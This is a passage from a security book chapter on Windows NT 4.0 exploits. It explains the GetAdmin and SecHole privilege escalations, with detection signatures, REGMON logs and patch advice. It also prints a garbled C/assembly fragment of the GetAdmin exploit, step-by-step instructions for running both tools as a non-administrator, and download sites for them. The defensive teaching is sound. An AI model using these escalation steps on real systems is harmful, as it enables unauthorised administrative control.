Hackers Beware

As you can see, the resource kit has a lot of valuable tools that make it easier to protect and monitor the security of your NT servers.

Hardening Guides

There are many hardening guides available to assist an administrator in the hardening of her operating system. These guides offer an administrator a step-by-step procedure for locking down her machines. They also assist network administrators by offering a repeatable process so that steps are not missed. There are several hardening guides available, but one of the best is published by SANS at http://www.sans.org.

Summary

In this chapter, we covered a lot of ground and laid the foundation for understanding the specific NT exploits, which will be explained next. It is important to remember that even though this chapter concentrated on NT, a lot of the concepts we covered apply to all operating systems. For example, no matter what operating system you run, it is critical that you know and understand what is running on the system in terms of services, open ports, user accounts, and network protocols. There is no way that you can protect a system if you do not know what you are protecting

Chapter 12. Specific Exploits for NT

NT SERVERS ARE USED BY A LARGE NUMBER OF companies for missioncritical applications. NT servers are also used as the base operating system for firewalls and web servers, which are directly accessible from the Internet. Whenever operating systems have such a large installation base, the potential for abuse increases. Attackers will try to compromise these systems to gain access to sensitive information. Therefore, it is critical for administrators to understand the threats and exploits that exist for NT, so they can properly secure their systems.

One book cannot cover every single exploit for NT because there are too many. This does not just apply to Microsoft’s operating systems, however, because most operating systems have numerous exploits. The goal of this

chapter is to build on the base information covered in Chapter 11, “Fundamentals of Microsoft NT” and discuss a range of specific NT exploits. The descriptions of these exploits are meant to give you a better understanding of how each specific exploit works and the types of things attackers use to compromise a system. After we discuss these exploits, you will have a better appreciation for what needs to be done to secure your NT systems

Exploits for NT

The following are the NT exploits we cover in this chapter:

•GetAdmin

•Sechole

•Red Button

•RDS Security Hole in Microsoft IIS

•Microsoft Shares

•Legion

•Relative shell path vulnerability

•NT DSN Hijack using ODBC data source tools

•Winfreeze

•Microsoft Windows Media Player JavaScript URL Vulnerability

•Microsoft Internet Explorer ‘mstask.exe’ CPU Consumption Vulnerability

•Microsoft MSHTML.DLL Crash Vulnerability

•2001 IIS 5.0 allows files to be viewed using %3F+.htr

•Media Player 7 and IE Java vulnerability

•IE 5.x/Outlook allows arbitrary programs to be executed using .chm files and the temporary Internet file folder.

•IIS 5.0 with patch Q277873 allows arbitrary commands to be executed on the web server

•Microsoft WINS Domain Controller Spoofing Vulnerability

These examples discuss a wide range of exploits against various aspects of Microsoft NT. Some of these exploits are old, but they have been included to show some of the ways NT has been exploited. They have been included based on this philosophy: The best way to approach the future is to learn from the past. I have seen cases where an older exploit has been fixed, but a newer version of the operating system becomes vulnerable again to the same exploit. In other cases, the system is patched against a specific exploit, but the underlying vulnerability that enables the exploit to work is still present on the system. One such example is Red Button. This is an exploit that has been around for a while, and most systems have been patched. However, the underlying vulnerability, improper permissions, is still present on most systems. This is why it is still important to understand and protect against some of the older exploits.

What is CVE?

As you go through these exploits, you may notice in the “Exploit Details” sections that there is a CVE number listed for the exploit. CVE stands for Common Vulnerabilities and Exposures, and it is an effort by Mitre to come up with a list of standardized names for vulnerabilities and other information security exposures. CVE aims to standardize the names for all publicly known vulnerabilities and security exposures. The goal of CVE is to make it easier to share data across separate vulnerability databases and security tools. Although CVE may make it easier to search for information in other databases, CVE should not be considered as a vulnerability database on its own merit—no database can contain all possible vulnerabilities and exposures. Additional information can be found at cve.mitre.org. CVE is a great effort, and if you are not familiar with it, you should definitely go to Mitre’s Web site.

GetAdmin

Getadmin is a tool that is used to escalate privileges on an NT system. With some exploits, you immediately get administrator access on the system, but in other cases you can only get a lower level of access. In these cases you would initially get access like guest privileges and than use a tool like GetAdmin to elevate or increase your access.

Exploit Details

•Name: GetAdmin

•CVE Number: CVE-1999-0496

•Operating System: Microsoft NT 4.0

•Protocols/Services: Win Logon Process

•Brief Description: An attack that grants administrative rights to normal users by adding them to the Administrators group

Getadmin.exe is a utility available on the Internet that grants administrative rights to normal users by adding them to the Administrators group. Getadmin.exe can be run from any user context, except Guest, and it grants administrative rights to a local user account. This utility works by taking advantage of a weakness in the WinLogon process on Windows NT 4.0 systems.

Detailed Description

GetAdmin works because of a problem in a low-level kernel routine, which causes a global flag to be set, allowing calls to NtOpenProcessToken to succeed regardless of the current user’s permissions. This in turn allows a

user to attach to any process running on the system, including processes running in the system’s security context, such as WinLogon. Once a user is attached to such a process, a thread can be started in the security context of the process.

In the specific case of GetAdmin, it attaches to the WinLogon process, which is running in the system’s security context, and makes standard API calls that add the specified user to the Administrators group.

It is important to note that any account granted the right to “Debug Programs” will always be able to run Getadmin.exe successfully, even if the hot fix is applied to fix this problem because the Debug Programs right enables a user to attach to any process. Debug Programs is initially granted to administrators, and it should only be granted to well-trusted users.

Also, if Getadmin.exe is run with an account that is already a member of the administrators’ local group, it will work even after applying the hot fix. This is by design. Members of the administrators’ group always have the right to make the calls GetAdmin needs to succeed.

Symptoms

Getadmin.exe must be executed locally, and it works for accounts on a workstation or member server and for domain accounts on a primary domain controller (PDC). The utility does not function on a backup domain controller (BDC) because the account database on a BDC is read only. The only way to modify a domain account database using GetAdmin is to logon to a PDC and run the utility locally on the PDC. In most environments, only administrators should have local access to logon to the PDC. Therefore, one of the main symptoms indicating that the GetAdmin utility is possibly being exploited is if a non-privileged user has logged on locally to the PDC.

Signature

To detect whether someone has used the GetAdmin exploit, security auditing must be turned on. The events that need auditing are Security Policy Changes and Process Tracking. When the appropriate auditing is turned on, the following event occurs in the security log and can be viewed with Event Viewer in NT:

A new process has been created:

New Process ID: 2159001632

Image File Name: GetAdmin.exe

Creator Process ID: 2154990112

User Name: Eric

Domain: NTSERVER4A

Logon ID: (0x0,0x1E14)

The easiest way to detect whether this exploit has been run is to see that the GetAdmin file has been run. However, it would be very easy for someone to change the name of the program prior to running it.

This is one of the main reasons it is so important to review the audit files on a daily basis and to fully understand what is being run on any of your systems. One of the first rules of security is know thy system.

Another signature of an exploit is that it sometimes modifies the values in the Registry. If it does, this can also be used to detect an exploit. The following is a log dump from the Registry Monitor (REGMON) showing what Registry keys are accessed during execution of GetAdmin. This takes more work to detect, but it is a better symptom of the GetAdmin exploit.

21 lsass.exe OpenKey 0xE1237D40\Policy SUCCESS Key: 0xE18995C0

22 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

23 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc BUFOVRFLOW

24 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 25E16C9E60

26 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

27 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

28 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

43 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

44 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc BUFOVRFLOW

45 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

46 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

47 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

48 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

49 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

This log dump shows which key values were changed; they can be looked for with an automated scanning tool.

REGMON is a program that comes with the Windows NT Resource Kit. Remember the concept of defense in depth; REGMON should be one of the many tools in a company’s security arsenal.

How to Protect Against It

The best way to protect against the GetAdmin exploit is to apply a fix to the Windows NT Kernel routine, developed by Microsoft, which fixes the call that sets the global flag. This fix prevents an application, such as Getadmin.exe, from attaching to WinLogon (or any other process not owned by the user) and from granting administrative rights to users.

To resolve this problem, obtain the latest service pack for Windows NT 4.0 or Windows NT Server 4.0, Terminal Server Edition. For additional information, please see Microsoft Knowledge Base article Q152734.

Source Code/Pseudo Code

Given the nature of the GetAdmin program, it can get administrator rights without any special privileges. Simply run GetAdmin or GetAdmin account_name from a command line. If you do not enter an account name, the current account is used. The following is a sample of source code for the GetAdmin exploit:

Function ChangeNtGlobalFlag :

BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag)

{

DWORD callnumber = 0x3; //NtAddAtom DWORD stack[32] ; int i; DWORD handle=0;

CHAR string[255]; if(!pNtGlobalFlag) return 0;

stack[0] = (DWORD)string; stack[1] = (DWORD)&handle; for(i=0;i ? 0x100;i++)

{

sprintf(string,"NT now cracking... pass %d",i); if(handle & 0xf00){ stack[1] = (DWORD)pNtGlobalFlag+1;

}__asm

{

mov eax, callnumber; mov edx, stack;

lea edx,dword ptr [stack]; int 0x2e;

if( stack[1] == pNtGlobalFlag+1) break;

}return TRUE;}

The following is the string that does most of the work in GetAdmin:

ChangeNtGlobalFlag(GetNtGlobalFlagPtr());

After running GetAdmin, you can open any process in the system because the function NtOpenProcess does not check for SE_DEBUG_PRIVILEGE if the bit in NtGlobalFlag+2 is set. GetAdmin then injects the dll into the

WinLogon process. The WinLogon process has the ability to issue SYSTEM account calls, so it can add/remove users from the Administrator group.

The main bug in NT is that the subfunction in NtAddAtom does not check the address of output. Therefore, it is possible to write in any space of kernel memory. Of course, it is not necessary to inject the WinLogon dll to get admin rights, you can simply patch the same place of NT OS kernel or replace the process token. If you have the full source code, you can play around with other variations of GetAdmin.

The GetAdmin program can be downloaded from the Internet in the form of a zip file. The file contains two files—an executable and a dll that is needed for the executable. After the program is downloaded, unzip the two files into a directory and run them from a DOS window. To run the program, you type getadmin from the DOS prompt. If it works, you do not receive any message, and you are returned to the prompt. If there is a problem, a message is displayed. The following is the output from running the program:

c:>\getadmin\getadmin

c:>\getadmin

The following sites contain source code and executables for GetAdmin:

•http://www.infowar.co.uk/mnemonix/utils.htm

•http://hackersclub.com/km/files/nt/index.html

•http://www.insecure.org

Additional Information

Additional information can be downloaded from the following sites:

•http://www.microsoft.com/security

•http://www.microsoft.com/ntserver/security/default.asp

•http://www.infowar.co.uk/mnemonix/utils.htm#admin

•http://hackersclub.com/km/files/nt/index.html

•http://www.insecure.org

SecHole

SecHole performs a very sophisticated set of steps that enable a nonadministrative user to gain debug-level access on a system process.

Exploit Details

•Name: SecHole

•CVE Number: CVE-1999-0344

•Operating System: Microsoft NT Server and Workstation

SecHole.exe is a utility that is being circulated to perform a very sophisticated set of steps that allow a non-administrative user to gain debug-level access on a system process. By using SecHole, the nonadministrative user is able to run some code in the system security context and, thereby, grant himself local administrative privileges on the system. SecHole locates the memory address of a particular API function and modifies the instructions at that address in a running image of the exploit program on the local system. SecHole.exe requests debug rights, giving it elevated privileges. The request is successful because the access check for this right is expected to be done in the API, which was successfully modified by the exploit program. SecHole.exe can now add the user who invoked SecHole.exe to the local Administrators group.

The following are the versions of NT effected by this exploit:

•Microsoft Windows NT Server versions 3.51, 4.0

•Microsoft Windows NT Workstation versions 3.51, 4.0

•Microsoft Windows NT Server, Enterprise Edition version 4.0

•Microsoft Windows NT Server version 4.0, Terminal Server Edition.

Detailed Description

By exploiting existing Windows NT services, an application can locate a certain API call in memory (OpenProcess), modify the instructions in a running instance, and gain debug-level access to the system, where it then grants the logged-in user complete membership to the Administrators group in the local SAM database.

Specifically, the exploit program does the following:

•Locates the memory address of a particular API function used by the DebugActiveProcess function.

•Modifies the instructions at that address to return success in a failure case.

•Iterates through the processes running as local system, calling DebugActiveProcess on each, until a successful attach is performed. The server side component of DebugActiveProcess does not correctly check for valid access to the target process.

•Creates a thread in the victim process that runs code from an accompanying DLL. This thread adds the user who is running the program to the local Administrators group.

Symptoms

SecHole must be executed locally and works for accounts on a workstation or member server and for domain accounts on a PDC. The utility does not

function on a BDC because the account database on a BDC is read only. The only way to use SecHole to modify a domain account database is to logon to a PDC and run the utility locally on the PDC.

In most environments, only administrators should have local access to logon to the PDC. Therefore, one of the main symptoms possibly indicating whether the SecHole utility is being exploited is if a nonprivileged user has logged on locally to the PDC.

Also, user programs normally do not call the debug active process, so any program calling it could indicate that someone is exploiting the SecHole utility.

Signature

To detect if someone has used the SecHole exploit, security auditing must be turned on. The events that need auditing are Security Policy Changes and Process Tracking. When the appropriate auditing is turned on, the following event occurs in the security log and can be viewed with Event Viewer in NT.

A new process has been created:

New Process ID: 2153850144

Image File Name: SECHOLE.EXE

Creator Process ID: 2153324576

User Name: Eric

Domain: EricNT

Logon ID: (0x0,0x9353)

The easiest way to detect whether the SecHole exploit has been used is to see whether the SecHole file has been run. However, it would also be very easy for someone to change the name of the program prior to running it.

This is one of the main reasons it is so important to review the audit files on a daily basis and to fully understand what is being run on any of your systems.

The following is a log dump from the Registry Monitor (REGMON) showing which Registry keys were accessed during execution of SecHole. This takes more work to detect, but it is a better symptom of the SecHole exploit.

32 winlogon.exe QueryValue 0xE12232C0\SOFTWARE\AntiShut\Account name SUCCESS \TESTACCOUNT"

33 winlogon.exe CloseKey 0xE12232C0\SOFTWARE\AntiShut\Account name SUCCESS Key:

0xE1302420

34 lsass.exe OpenKey 0xE1237D40\Policy SUCCESS Key: 0xE1302420

35 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE18995C0

36 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc BUFOVRFLOW

37 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE18995C0

38 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE18995C0

39 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

40 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

41 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE18995C0

42 lsass.exe OpenKey 0xE1237D40\Policy SUCCESS Key: 0xE18995C0

43 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

44 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc BUFOVRFLOW

45 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

46 lsass.exe OpenKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

47 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

48 lsass.exe QueryValue 0xE1237D40\Policy\SecDesc SUCCESS NONE

49 lsass.exe CloseKey 0xE1237D40\Policy\SecDesc SUCCESS Key: 0xE16C9E60

REGMON is a program that comes with the Windows NT Resource Kit.

How to Protect Against It

To resolve this problem, obtain the latest service pack for Windows NT version 4.0. For more information, please see Microsoft Knowledge Base article Q152734.

SecHole Program

Any normal (non-administrative) user on a Windows NT system can instantly gain administrative control for the entire machine by running SecHole. First, login as any non-administrative user on a machine (a guest account will do). You can verify that the logged in user does not possess administrative privilege at this time by trying to run the windisk program from a DOS prompt. This should fail because the user does not have administrative privilege.

After logging in, copy the software (sechole.exe and admindll.dll) onto your hard disk in any directory that allows you write and execute access. Open up a DOS window and run the corresponding program. After running